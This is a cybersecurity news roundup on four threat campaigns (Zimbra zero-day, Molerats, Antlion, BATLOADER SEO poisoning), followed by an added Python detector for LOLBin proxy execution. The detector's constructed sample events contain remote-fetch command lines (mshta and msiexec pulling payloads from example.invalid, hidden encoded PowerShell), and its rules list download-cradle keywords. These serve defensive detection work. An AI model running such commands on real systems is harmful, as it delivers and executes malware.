At a glance.
- Zero-day flaw in Zimbra exploited by suspected Chinese threat actor.
- New Molerats campaign.
- Antlion targets financial entities in Taiwan.
- Cybercriminals use SEO poisoning.
Zero-day flaw in Zimbra exploited by suspected Chinese threat actor.
Researchers at Volexity are tracking a cyberespionage campaign being run by a suspected Chinese threat actor. The threat actor exploited a zero-day cross-site scripting vulnerability in the Zimbra email platform:
"The campaigns came in multiple waves across two attack phases. The initial phase was aimed at reconnaissance and involved emails designed to simply track if a target received and opened the messages. The second phase came in several waves that contained email messages luring targets to click a malicious attacker-crafted link. For the attack to be successful, the target would have to visit the attacker's link while logged into the Zimbra webmail client from a web browser. The link itself, however, could be launched from an application to include a thick client, such as Thunderbird or Outlook. Successful exploitation results in the attacker being able to run arbitrary JavaScript in the context of the user's Zimbra session. Volexity observed the attacker attempting to load JavaScript to steal user mail data and attachments."
Zimbra issued a hotfix for the flaw on Saturday.
New Molerats campaign.
Proofpoint has observed a new campaign by the Palestinian-aligned threat actor known as the Molerats. The threat actor is using a new malware implant dubbed "NimbleMamba":
"In late 2021, Proofpoint analysts identified a complex attack chain targeting Middle Eastern governments, foreign policy think tanks, and a state-affiliated airline. Over three months, Proofpoint observed three subtle variations of this attack chain. Proofpoint attributes these campaigns to TA402, an actor commonly tracked as Molerats and believed to be operating in the interest of the Palestinian Territories. Based on Proofpoint’s research, TA402 is a persistent threat to organizations and governments in the Middle East, routinely updating not only their malware implants, but also their delivery methods. After publication of Proofpoint’s TA402 research in June 2021, TA402 appeared to halt its activities for a short period of time, almost certainly to retool. Proofpoint researchers believe they used that time to update their implants and delivery mechanisms, using malware dubbed NimbleMamba and BrittleBush. TA402 also regularly uses geofencing techniques and varied attack chains which complicate detection efforts for defenders."
Antlion targets financial entities in Taiwan.
Symantec researchers describe an espionage campaign by a Chinese APT dubbed "Antlion" that's active against Taiwanese financial institutions. The threat actor is using a new backdoor called "xPack":
"The main custom backdoor used by Antlion in this campaign was the xPack backdoor, which is a custom .NET loader that decrypts (AES), loads, and executes accompanying .bin files. Its decryption password is provided as a command-line argument (Base64 encoded string), and xPack is intended to be run as a standalone application or as a service (xPackSvc variant). The xPack malware and its associated payload seem to be used for initial access; it appears that xPack was predominantly used to execute system commands, drop subsequent malware and tools, and stage data for exfiltration. The attackers also used a custom keylogger and three custom loaders."
The researchers note that the threat actor spent a "significant amount of time" within the compromised networks, lurking within one organization's network for nearly 250 days.
Cybercriminals use SEO poisoning.
Mandiant says a threat actor is using SEO poisoning to distribute the BATLOADER and ATERA malware. The researchers don't attribute the campaign to any known group, but they suspect this activity is a precursor to ransomware attacks:
"The threat actor used 'free productivity apps installation' or 'free software development tools installation' themes as SEO keywords to lure victims to a compromised website and to download a malicious installer. The installer contains legitimate software bundled with the BATLOADER malware. The BATLOADER malware is dropped and executed during the software installation process.
"This initial BATLOADER compromise was the beginning of a multi-stage infection chain that provides the attackers with a foothold inside the target organization. Every stage was prepared for the next phase of the attack chain. And legitimate tools such as PowerShell, Msiexec.exe, and Mshta.exe allow proxy execution of malicious payloads to avoid detection."
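Mandiant's excerpt names PowerShell, Msiexec.exe and Mshta.exe as the legitimate binaries used for proxy execution after the trojanized installer runs. The following is an added defender-side example, not code from Mandiant's report or from the campaign: a handful of heuristic rules run over constructed process-creation records. The field names (ParentImage, Image, CommandLine) follow Sysmon Event ID 1 naming, the installer-parent heuristic and the rule names are the author's assumptions, and every sample record is constructed, not real telemetry.

```python
"""Heuristics for LOLBin proxy execution (added example; records are constructed)."""
from __future__ import annotations

import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://", re.IGNORECASE)
LOLBINS = ("mshta.exe", "msiexec.exe", "powershell.exe", "pwsh.exe")


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_event(event: dict) -> list[Finding]:
    """Evaluate one process-creation event against the proxy-execution heuristics."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    findings: list[Finding] = []

    # mshta.exe normally runs a local .hta; a URL or an inline script protocol is unusual.
    if image == "mshta.exe" and (URL_RE.search(cmd) or "javascript:" in low or "vbscript:" in low):
        findings.append(Finding("mshta_remote_or_inline_script", image, cmd))

    # msiexec.exe pulling a package straight from a URL (often with /q or /qn).
    if image == "msiexec.exe" and URL_RE.search(cmd):
        findings.append(Finding("msiexec_remote_package", image, cmd))

    # PowerShell with an encoded command or a download-and-execute cradle.
    if image in ("powershell.exe", "pwsh.exe"):
        encoded = re.search(r"\s-e(nc|ncodedcommand)?\s", low)
        cradle = any(t in low for t in ("downloadstring", "invoke-expression", "iex ", "frombase64string"))
        if encoded or cradle:
            findings.append(Finding("powershell_encoded_or_download_cradle", image, cmd))

    # The excerpt describes BATLOADER running inside an installer, so one of these binaries
    # launched by an installer-like parent is worth review (heuristic; assumed naming).
    if image in LOLBINS and re.search(r"(setup|install)", parent):
        findings.append(Finding("lolbin_spawned_by_installer", image, cmd))
    return findings


def scan(events: list[dict]) -> list[Finding]:
    """Run check_event over a batch of events and collect all findings."""
    results: list[Finding] = []
    for event in events:
        results.extend(check_event(event))
    return results


# Constructed sample records (not real telemetry); example.invalid is a reserved test domain.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\u\Downloads\Productivity_Setup.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://example.invalid/stage2.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\u\Downloads\agent.msi" /qn'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i https://example.invalid/agent.msi /qn"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -enc <base64-blob>"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:40} {f.image:16} {f.command_line}")
```

The second and fourth records are benign (a local MSI launched from Explorer, a scheduled script with an execution-policy override but no encoding or cradle) and produce no findings; the others trigger one rule each, and the mshta record also trips the installer-parent heuristic.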